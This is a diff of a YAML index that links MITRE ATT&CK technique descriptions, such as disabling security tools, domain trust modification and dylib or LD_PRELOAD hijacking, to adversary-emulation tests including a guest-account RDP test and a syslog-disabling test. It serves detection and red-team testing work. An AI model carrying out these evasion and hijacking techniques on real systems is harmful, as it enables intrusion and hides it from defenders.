Process monitoring + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace + - Containers identifier: T1078.001 atomic_tests: - name: Enable Guest account with RDP capability and admin priviliges @@ -29151,25 +21234,20 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-09-14T19:55:23.113Z' + modified: '2021-03-08T10:33:02.083Z' created: '2020-06-16T17:23:06.508Z' x_mitre_detection: |- The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity. In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs) x_mitre_data_sources: - - GCP audit logs - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs - x_mitre_version: '1.0' + - 'Instance: Instance Deletion' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User x_mitre_platforms: - - AWS - - GCP - - Azure + - IaaS atomic_tests: [] T1140: technique: @@ -29213,9 +21291,9 @@ defense-evasion: - Matthew Demaske, Adaptforward - Red Canary x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'File: File Modification' + - 'Script: Script Execution' x_mitre_defense_bypassed: - Anti-virus - Host intrusion prevention systems @@ -29276,6 +21354,76 @@ defense-evasion: del %temp%\T1140_calc2.txt >nul 2>&1 del %temp%\T1140_calc2_decoded.exe >nul 2>&1 name: command_prompt + T1610: + technique: + external_references: + - source_name: mitre-attack + external_id: T1610 + url: https://attack.mitre.org/techniques/T1610 + - source_name: Docker Containers API + url: https://docs.docker.com/engine/api/v1.41/#tag/Container + description: Docker. (n.d.). Docker Engine API v1.41 Reference - Container. + Retrieved March 29, 2021. + - source_name: Kubernetes Dashboard + url: https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/ + description: The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). + Retrieved March 29, 2021. + - source_name: Kubeflow Pipelines + url: https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/ + description: The Kubeflow Authors. (n.d.). Overview of Kubeflow Pipelines. + Retrieved March 29, 2021. + - source_name: Aqua Build Images on Hosts + url: https://blog.aquasec.com/malicious-container-image-docker-container-host + description: 'Assaf Morag. (2020, July 15). Threat Alert: Attackers Building + Malicious Images on Your Hosts. Retrieved March 29, 2021.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Deploy Container + description: |- + Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. + + Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts) + id: attack-pattern--56e0d8b8-3e25-49dd-9050-3aa252f5aa92 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: execution + modified: '2021-04-14T12:02:20.641Z' + created: '2021-03-29T16:51:26.020Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + - root + x_mitre_remote_support: true + x_mitre_detection: Monitor for suspicious or unknown container images and pods + in your environment. Deploy logging agents on Kubernetes nodes and retrieve + logs from sidecar proxies for application pods to detect malicious activity + at the cluster level. In Docker, the daemon log provides insight into remote + API calls, including those that deploy containers. Logs for management services + or applications used to deploy containers other than the native technologies + themselves should also be monitored. + x_mitre_contributors: + - Pawan Kinger, @kingerpawan, Trend Micro + - Alfredo Oliveira, Trend Micro + - Idan Frimark, Cisco + - Center for Threat-Informed Defense (CTID) + - Magno Logan, @magnologan, Trend Micro + - Ariel Shuper, Cisco + - Vishwas Manral, McAfee + - Yossi Weizman, Azure Defender Research Team + x_mitre_platforms: + - Containers + x_mitre_data_sources: + - 'Container: Container Creation' + - 'Container: Container Start' + - 'Pod: Pod Creation' + - 'Pod: Pod Modification' + - 'Application Log: Application Log Content' + atomic_tests: [] T1006: technique: id: attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5 @@ -29303,7 +21451,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-01-30T22:27:39.932Z' + modified: '2021-02-09T14:09:00.753Z' created: '2017-05-31T21:30:20.934Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -29313,12 +21461,13 @@ defense-evasion: x_mitre_detection: |- Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy) - Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1086), additional logging of PowerShell scripts is recommended. + Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1059/001), additional logging of PowerShell scripts is recommended. x_mitre_defense_bypassed: - File monitoring - File system access controls x_mitre_data_sources: - - API monitoring + - 'Command: Command Execution' + - 'Drive: Drive Access' x_mitre_version: '2.0' identifier: T1006 atomic_tests: @@ -29392,9 +21541,9 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-19T16:31:34.489Z' + modified: '2021-03-15T16:43:04.273Z' created: '2020-10-12T13:52:32.846Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User @@ -29406,19 +21555,18 @@ defense-evasion: Additionally, a sudden loss of a log source may indicate that it has been disabled.' x_mitre_data_sources: - - AWS CloudTrail logs - - Azure activity logs - - GCP audit logs + - 'Cloud Service: Cloud Service Modification' + - 'Cloud Service: Cloud Service Disable' x_mitre_contributors: + - Syed Ummar Farooqh, McAfee + - Prasad Somasamudram, McAfee + - 'Sekhar Sarukkai, McAfee ' - Ibrahim Ali Khan - - AttackIQ + - Alex Soler, AttackIQ - Janantha Marasinghe - - 'Sekhar Sarukkai; Prasad Somasamudram; Syed Ummar Farooqh (McAfee) ' - Matt Snyder, VMware x_mitre_platforms: - - GCP - - Azure - - AWS + - IaaS atomic_tests: [] T1600.002: technique: @@ -29446,7 +21594,7 @@ defense-evasion: modified: '2020-10-21T22:37:48.503Z' created: '2020-10-19T19:11:18.757Z' x_mitre_data_sources: - - File monitoring + - 'File: File Modification' x_mitre_platforms: - Network x_mitre_detection: There is no documented method for defenders to directly identify @@ -29493,9 +21641,8 @@ defense-evasion: x_mitre_detection: Monitor processes and command-line arguments for commands that can be used to disable logging. Lack of event logs may be suspicious. x_mitre_data_sources: - - Process monitoring - - Windows event logs - - Process command-line parameters + - 'Sensor Health: Host Status' + - 'Command: Command Execution' x_mitre_platforms: - Windows identifier: T1562.002 @@ -29610,25 +21757,21 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-09-14T20:02:24.426Z' + modified: '2021-03-08T10:33:02.146Z' created: '2020-06-24T16:55:46.243Z' x_mitre_contributors: - Expel x_mitre_detection: Monitor cloud logs for modification or creation of new security groups or firewall rules. - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User x_mitre_data_sources: - - Stackdriver logs - - GCP audit logs - - Azure activity logs - - AWS CloudTrail logs + - 'Firewall: Firewall Rule Modification' + - 'Firewall: Firewall Disable' x_mitre_platforms: - - AWS - - GCP - - Azure + - IaaS atomic_tests: [] T1562.004: technique: @@ -29661,9 +21804,10 @@ defense-evasion: x_mitre_detection: Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls. x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Windows Registry + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Modification' + - 'Firewall: Firewall Disable' + - 'Firewall: Firewall Rule Modification' x_mitre_platforms: - Linux - macOS @@ -29778,22 +21922,6 @@ defense-evasion: elevation_required: true T1562.001: technique: - created: '2020-02-21T20:32:20.810Z' - modified: '2020-03-29T21:52:43.151Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern - id: attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579 - description: Adversaries may disable security tools to avoid possible detection - of their tools and activities. This can take the form of killing security - software or event logging processes, deleting Registry keys so that tools - do not start at run time, or other methods to interfere with security tools - scanning or reporting information. - name: Disable or Modify Tools - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1562.001 @@ -29801,30 +21929,54 @@ defense-evasion: - external_id: CAPEC-578 source_name: capec url: https://capec.mitre.org/data/definitions/578.html - x_mitre_platforms: - - Windows - - macOS - - Linux - x_mitre_data_sources: - - Process command-line parameters - - Windows Registry - - Services - - File monitoring - x_mitre_detection: Monitor processes and command-line arguments to see if security - tools are killed or stop running. Monitor Registry edits for modifications - to services and startup programs that correspond to security tools. Lack of - log events may be suspicious. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Disable or Modify Tools + description: Adversaries may disable security tools to avoid possible detection + of their tools and activities. This can take the form of killing security + software or event logging processes, deleting Registry keys so that tools + do not start at run time, or other methods to interfere with security tools + scanning or reporting information. + id: attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-19T13:41:17.746Z' + created: '2020-02-21T20:32:20.810Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator x_mitre_defense_bypassed: - Anti-virus - Log analysis - Signature-based detection - Host intrusion prevention systems - File monitoring - x_mitre_permissions_required: - - User - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_detection: Monitor processes and command-line arguments to see if security + tools are killed or stop running. Monitor Registry edits for modifications + to services and startup programs that correspond to security tools. Lack of + log events may be suspicious. + x_mitre_data_sources: + - 'Process: Process Termination' + - 'Windows Registry: Windows Registry Key Modification' + - 'Windows Registry: Windows Registry Key Deletion' + - 'Command: Command Execution' + - 'Service: Service Metadata' + - 'Sensor Health: Host Status' + x_mitre_platforms: + - Windows + - macOS + - Linux + - Containers + - IaaS + x_mitre_contributors: + - Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security + - Nathaniel Quist, Palo Alto Networks + - Gal Singer, @galsinger29, Team Nautilus Aqua Security identifier: T1562.001 atomic_tests: - name: Disable syslog @@ -30424,8 +22576,8 @@ defense-evasion: Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence. x_mitre_data_sources: - - Authentication logs - - Process monitoring + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_platforms: - Linux - macOS @@ -30468,12 +22620,15 @@ defense-evasion: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-08-26T14:16:48.125Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:10:26.613Z' created: '2020-02-11T19:05:02.399Z' x_mitre_data_sources: - - Authentication logs - - API monitoring - - DLL monitoring + - 'Logon Session: Logon Session Creation' + - 'Process: OS API Execution' + - 'Process: Process Access' + - 'File: File Modification' x_mitre_permissions_required: - Administrator x_mitre_detection: "Monitor for calls to OpenProcess that can be @@ -30490,11 +22645,156 @@ defense-evasion: used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). " - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_platforms: - Windows atomic_tests: [] + T1484: + technique: + id: attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d + description: |- + Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts. + + With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207). + + Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators. + name: Domain Policy Modification + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1484 + url: https://attack.mitre.org/techniques/T1484 + - source_name: ADSecurity GPO Persistence 2016 + url: https://adsecurity.org/?p=2716 + description: 'Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence + #17: Group Policy. Retrieved March 5, 2019.' + - description: Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and + OUs. Retrieved March 5, 2019. + url: https://wald0.com/?p=179 + source_name: Wald0 Guide to GPOs + - source_name: Harmj0y Abusing GPO Permissions + url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ + description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved + March 5, 2019. + - source_name: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks + url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ + description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State + Cyber Attacks. Retrieved December 30, 2020. + - source_name: Microsoft - Azure Sentinel ADFSDomainTrustMods + url: https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml + description: Microsoft. (2020, December). Azure Sentinel Detections. Retrieved + December 30, 2020. + - source_name: Microsoft 365 Defender Solorigate + url: https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/ + description: Microsoft 365 Defender Team. (2020, December 28). Using Microsoft + 365 Defender to protect against Solorigate. Retrieved January 7, 2021. + - source_name: Sygnia Golden SAML + url: https://www.sygnia.co/golden-saml-advisory + description: Sygnia. (2020, December). Detection and Hunting of Golden SAML + Attack. Retrieved January 6, 2021. + - source_name: CISA SolarWinds Cloud Detection + url: https://us-cert.cisa.gov/ncas/alerts/aa21-008a + description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity + in Microsoft Cloud Environments. Retrieved January 8, 2021. + - source_name: Microsoft - Update or Repair Federated domain + url: https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365 + description: Microsoft. (2020, September 14). Update or repair the settings + of a federated domain in Office 365, Azure, or Intune. Retrieved December + 30, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-02-09T15:52:24.598Z' + created: '2019-03-07T14:10:32.650Z' + x_mitre_platforms: + - Windows + - Azure AD + x_mitre_data_sources: + - 'Active Directory: Active Directory Object Creation' + - 'Active Directory: Active Directory Object Deletion' + - 'Active Directory: Active Directory Object Modification' + - 'Command: Command Execution' + x_mitre_permissions_required: + - Administrator + - User + x_mitre_version: '2.0' + x_mitre_detection: |- + It may be possible to detect domain policy modifications using Windows event logs. Group policy modifications, for example, may be logged under a variety of Windows event IDs for modifying, creating, undeleting, moving, and deleting directory service objects (Event ID 5136, 5137, 5138, 5139, 5141 respectively). Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection) + + Consider monitoring for commands/cmdlets and command-line arguments that may be leveraged to modify domain policy settings.(Citation: Microsoft - Update or Repair Federated domain) Some domain policy modifications, such as changes to federation settings, are likely to be rare.(Citation: Microsoft 365 Defender Solorigate) + x_mitre_defense_bypassed: + - System access controls + - File system access controls + x_mitre_is_subtechnique: false + atomic_tests: [] + T1484.002: + technique: + id: attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee + description: |- + Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. + + Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. + name: Domain Trust Modification + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1484.002 + url: https://attack.mitre.org/techniques/T1484/002 + - source_name: Microsoft - Azure AD Federation + url: https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed + description: Microsoft. (2018, November 28). What is federation with Azure + AD?. Retrieved December 30, 2020. + - source_name: Microsoft - Azure Sentinel ADFSDomainTrustMods + url: https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml + description: Microsoft. (2020, December). Azure Sentinel Detections. Retrieved + December 30, 2020. + - source_name: Sygnia Golden SAML + url: https://www.sygnia.co/golden-saml-advisory + description: Sygnia. (2020, December). Detection and Hunting of Golden SAML + Attack. Retrieved January 6, 2021. + - source_name: CISA SolarWinds Cloud Detection + url: https://us-cert.cisa.gov/ncas/alerts/aa21-008a + description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity + in Microsoft Cloud Environments. Retrieved January 8, 2021. + - source_name: Microsoft - Update or Repair Federated domain + url: https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365 + description: Microsoft. (2020, September 14). Update or repair the settings + of a federated domain in Office 365, Azure, or Intune. Retrieved December + 30, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-01-11T18:21:20.213Z' + created: '2020-12-28T21:59:02.181Z' + x_mitre_platforms: + - Windows + - Azure AD + x_mitre_contributors: + - Blake Strom, Microsoft 365 Defender + x_mitre_detection: |- + Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection) + + Monitor for PowerShell commands such as: Update-MSOLFederatedDomain –DomainName: "Federated Domain Name", or Update-MSOLFederatedDomain –DomainName: "Federated Domain Name" –supportmultipledomain.(Citation: Microsoft - Update or Repair Federated domain) + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Active Directory: Active Directory Object Creation' + - 'Active Directory: Active Directory Object Modification' + - 'Command: Command Execution' + atomic_tests: [] T1601.002: technique: external_references: @@ -30543,8 +22843,7 @@ defense-evasion: it may be appropriate to also verify the integrity of the vendor provided operating system image file. ' x_mitre_data_sources: - - Network device configuration - - File monitoring + - 'File: File Modification' x_mitre_platforms: - Network atomic_tests: [] @@ -30552,11 +22851,9 @@ defense-evasion: technique: id: attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490 description: |- - Adversaries may execute their own malicious payloads by hijacking ambiguous paths used to load libraries. Adversaries may plant trojan dynamic libraries, in a directory that will be searched by the operating system before the legitimate library specified by the victim program, so that their malicious library will be loaded into the victim program instead. MacOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. + Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added. - A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X) - - If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. + Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO) name: Dylib Hijacking created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -30568,14 +22865,38 @@ defense-evasion: - external_id: CAPEC-471 source_name: capec url: https://capec.mitre.org/data/definitions/471.html + - source_name: Wardle Dylib Hijack Vulnerable Apps + url: https://objective-see.com/blog/blog_0x46.html + description: Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore + Apps. Retrieved March 31, 2021. + - source_name: Wardle Dylib Hijacking OSX 2015 + url: https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf + description: Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved + March 29, 2021. + - source_name: Github EmpireProject HijackScanner + url: https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py + description: Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib + Hijack Vulnerability Scanner. Retrieved April 1, 2021. + - source_name: Github EmpireProject CreateHijacker Dylib + url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py + description: Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib + Hijacker. Retrieved April 1, 2021. - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017. source_name: Writing Bad Malware for OSX - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X + - source_name: wardle artofmalware volume1 + url: https://taomm.org/vol1/pdfs.html + description: 'Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume + 0x1: Analysis. Retrieved March 19, 2021.' + - source_name: MalwareUnicorn macOS Dylib Injection MachO + url: https://malwareunicorn.org/workshops/macos_dylib_injection.html#5 + description: Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. + Retrieved March 29, 2021. + - source_name: Apple Developer Doco Archive Run-Path + url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html + description: Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved + March 31, 2021. type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack @@ -30584,35 +22905,236 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-09-16T16:48:09.391Z' + modified: '2021-04-27T20:19:15.212Z' created: '2020-03-16T15:23:30.896Z' x_mitre_platforms: - macOS x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: 'Objective-See''s Dylib Hijacking Scanner can be used to - detect potential cases of dylib hijacking. Monitor file systems for moving, - renaming, replacing, or modifying dylibs. Changes in the set of dylibs that - are loaded by a process (compared to past behavior) that do not correlate - with known software, patches, etc., are suspicious. Check the system for multiple - dylibs with the same name and monitor which versions have historically been - loaded into a process. ' + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + x_mitre_detection: "Monitor file systems for moving, renaming, replacing, or + modifying dylibs. Changes in the set of dylibs that are loaded by a process + (compared to past behavior) that do not correlate with known software, patches, + etc., are suspicious. Check the system for multiple dylibs with the same name + and monitor which versions have historically been loaded into a process. \n\nRun + path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, + and LC_RPATH. Other special keywords are recognized by the macOS + loader are @rpath, @loader_path, and @executable_path.(Citation: + Apple Developer Doco Archive Run-Path) These loader instructions can be examined + for individual binaries or frameworks using the otool -l command. + Objective-See's Dylib Hijacking Scanner can be used to identify applications + vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: + Github EmpireProject HijackScanner)" x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_defense_bypassed: - Application control atomic_tests: [] - T1055.001: + T1574.006: technique: - created: '2020-01-14T01:26:08.145Z' - modified: '2020-06-20T22:17:59.148Z' + id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825 + description: "Adversaries may execute their own malicious payloads by hijacking + environment variables the dynamic linker uses to load shared libraries. During + the execution preparation phase of a program, the dynamic linker loads specified + absolute paths of shared libraries from environment variables and files, such + as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES + on macOS. Libraries specified in environment variables are loaded first, taking + precedence over system libraries with the same function name.(Citation: Man + LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic + Libraries) These variables are often used by developers to debug binaries + without needing to recompile, deconflict mapped symbols, and implement custom + functions without changing the original library.(Citation: Baeldung LD_PRELOAD)\n\nOn + Linux and macOS, hijacking dynamic linker variables may grant access to the + victim process's memory, system/network resources, and possibly elevated privileges. + This method may also evade detection from security products since the execution + is masked under a legitimate process. Adversaries can set environment variables + via the command line using the export command, setenv + function, or putenv function. Adversaries can also leverage [Dynamic + Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export + variables in a shell or set variables programmatically using higher level + syntax such Python’s os.environ.\n\nOn Linux, adversaries may + set LD_PRELOAD to point to malicious libraries that match the + name of legitimate libraries which are requested by a victim program, causing + the operating system to load the adversary's malicious code upon execution + of the victim program. LD_PRELOAD can be set via the environment + variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: + TLDP Shared Libraries) Libraries specified by LD_PRELOAD are + loaded and mapped into memory by dlopen() and mmap() + respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed + Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) + \n\nOn macOS this behavior is conceptually the same as on Linux, differing + only in how the macOS dynamic libraries (dyld) is implemented at a lower level. + Adversaries can set the DYLD_INSERT_LIBRARIES environment variable + to point to malicious libraries containing names of legitimate libraries or + functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: + Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina + Bypass) " + name: Dynamic Linker Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.006 + url: https://attack.mitre.org/techniques/T1574/006 + - external_id: CAPEC-13 + source_name: capec + url: 